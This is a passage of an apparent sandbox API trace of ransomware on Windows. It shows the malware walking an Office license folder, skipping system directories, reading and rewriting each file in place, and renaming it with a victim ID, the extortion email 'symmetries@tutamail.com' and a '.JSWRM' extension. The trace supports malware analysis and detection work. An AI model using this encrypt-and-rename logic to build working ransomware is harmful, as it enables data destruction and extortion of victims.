hHeap=0x1e0000) returned 1 [0111.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0111.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0111.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0111.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0111.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0111.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0111.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0111.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0111.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.951] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec91a74c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec91a74c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec9d9300, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_SubTest-pl.xrm-ms", cAlternateFileName="VID00A~1.XRM")) returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.951] lstrcmpiW (lpString1="VisioStdO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0111.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0111.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0111.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0111.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0111.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.952] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11175) returned 1 [0111.952] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.952] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.955] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.955] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.955] CloseHandle (hObject=0x45c) returned 1 [0111.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0111.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0111.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0111.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.955] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0111.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0111.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0111.956] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec8a8030, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec8a8030, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecc15677, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x516f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_SubTest-ppd.xrm-ms", cAlternateFileName="VI6093~1.XRM")) returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.957] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0111.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0111.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0111.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0111.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0111.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.958] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20847) returned 1 [0111.958] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5160) returned 0x24c1d0 [0111.958] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5160, lpOverlapped=0x0) returned 1 [0111.961] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.961] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5160, lpOverlapped=0x0) returned 1 [0111.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.961] CloseHandle (hObject=0x45c) returned 1 [0111.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0111.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0111.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0111.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0111.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec79cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec79cf9c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec8ce288, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="VIC25C~1.XRM")) returned 1 [0111.966] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.966] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.966] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.966] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.967] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.967] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.967] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.967] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.967] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.967] lstrcmpiW (lpString1="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0111.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0111.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0111.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0111.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0111.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0111.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.968] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0111.969] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.969] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.971] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.971] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, 